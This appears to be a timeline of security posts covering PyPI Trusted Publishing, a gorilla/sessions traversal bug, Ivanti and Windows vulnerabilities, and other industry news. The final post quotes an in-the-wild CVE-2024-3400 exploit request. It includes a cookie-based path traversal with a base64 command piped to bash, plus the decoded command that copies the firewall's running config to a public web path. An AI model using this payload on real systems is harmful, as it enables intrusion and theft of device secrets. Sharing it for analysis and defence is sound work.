a git cheat sheet

I did a cool thing

@pypi now has three new Trusted Publishing, thanks (in part) to our work at @trailofbits! This realizes our goal of expanding Trusted Publishing to compute environments outside of GitHub Actions:

https://blog.pypi.org/posts/2024-04-17-expanding-trusted-publisher-support/

The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: https://go-review.googlesource.com/c/vulndb/+/579655

This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.

https://github.com/golang/vulndb/issues/2730

If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.

[RSS] CVE-2024-20697: Windows Libarchive Remote Code Execution Vulnerability

https://www.thezdi.com/blog/2024/4/17/cve-2024-20697-windows-libarchive-remote-code-execution-vulnerability

As expected, this wasn't related to that safe_printf() commit after all...

Slides of my @cansecwest talk are now published!

This device runs pure bare metal Go code, all reproducible, outmost transparency even if Secure Booted and locked down.

Your SBOM is go.mod and not a single line of C in sight, all memory safe.

Slides: https://github.com/abarisani/abarisani.github.io/tree/master/research/witness

The idea a vendor would suggest that only configurations with telemetry on were vulnerable and then have to walk that back is amazing. The USG needs to go on record and provide stable advice to people that these boxes should not be used and are not patchable. Being trustworthy sometimes means you have to annoy a vendor.

I’ve seen and talked to a number of people who don't feel that having a website is for them because they have nothing to share or put there ☹️. For many, having a website seems to mean having a "blog”, but I’m here to say that having a website *isn't* about blogging, it's about YOU.

https://shellsharks.com/notes/2024/04/17/having-a-website-is-about-you

Inside is a quick, hopefully mildly motivating writeup on things you can put on a personal website that have almost nothing to do with publishing "blog" content.

#indieweb #blogging

Let me get this straight: on-prem Exchange doesn't support DMARC/DKIM, but if you want to send e-mail to O365 users your messages need to be properly demagnezited by The Hawk himself?

https://learn.microsoft.com/en-us/answers/questions/1071500/dmarc-and-pkim-for-exchange-2019

urllib3, #Python's most-used HTTP client library, is fundraising to add HTTP/2 support and ensure long-term sustainability of the project.

Retoots and shares are appreciated 🙏

https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support

@metlstorm

[RSS] This Man Wants to ‘Save the World’ By Letting You Jerk Off Into a Computer

https://www.404media.co/orifice-ai-sex-toy/

A true hero!

[RSS] Dubious security vulnerability: Program allows its output to be exfiltrated

https://devblogs.microsoft.com/oldnewthing/20240416-00/?p=109668

Kids these days really should learn about threat modeling...

[RSS] “All Your Secrets Are Belong To Us” — A Delinea Secret Server AuthN/AuthZ Bypass

https://straightblast.medium.com/all-your-secrets-are-belong-to-us-a-delinea-secret-server-authn-authz-bypass-adc26c800ad3

[RSS] Dangerous Import: SourceForge Patches Critical Code Vulnerability

https://www.sonarsource.com/blog/dangerous-import-sourceforge-patches-critical-code-vulnerability

Happy #PatchTuesday from Ivanti. Security Update for Ivanti Avalanche 6.4.3 addresses a whopping 27 vulnerabilities with CVE-2024-29204 (heap overflow to remote code execution) being a 9.8 critical. No mention of exploitation. 🔗https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security-Hardening-and-CVEs-addressed?language=en_US and blog post https://www.ivanti.com/blog/security-update-for-ivanti-avalanche

#Ivanti #vulnerability

NEW: A crypto wallet maker said it had "credible intelligence" that hackers could target iPhone users with a zero-day, and even recommended turning off iMessage.

But the "credible intelligence" was actually just an ad on a scammy-looking dark web site.

Zero-days exist and it's good for people to be aware, but this post went viral and basically just spread FUD.

https://techcrunch.com/2024/04/16/a-crypto-wallet-makers-warning-about-an-imessage-bug-sounds-like-a-false-alarm/

Nice one! The usual clusterfuck LOLOL Not stripping Go binaries also a great idea LOLOLOl

https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

From hackinglz on the Nazi site:

Since it's out there now this is what I caught in wild CVE-2024-3400

GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}dGFyIC1jemYgL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvanMvanF1ZXJ5Lm1heC5qcyAvb3B0L3BhbmNmZy9tZ210L3NhdmVkLWNvbmZpZ3MvcnVubmluZy1jb25maWcueG1s|base64${IFS}-d|bash${IFS}-i`

b64 decoded

tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.max.js /opt/pancfg/mgmt/saved-configs/running-config.xml

Taring running config to world readable location in /global-protect/portal/js/jquery.max.js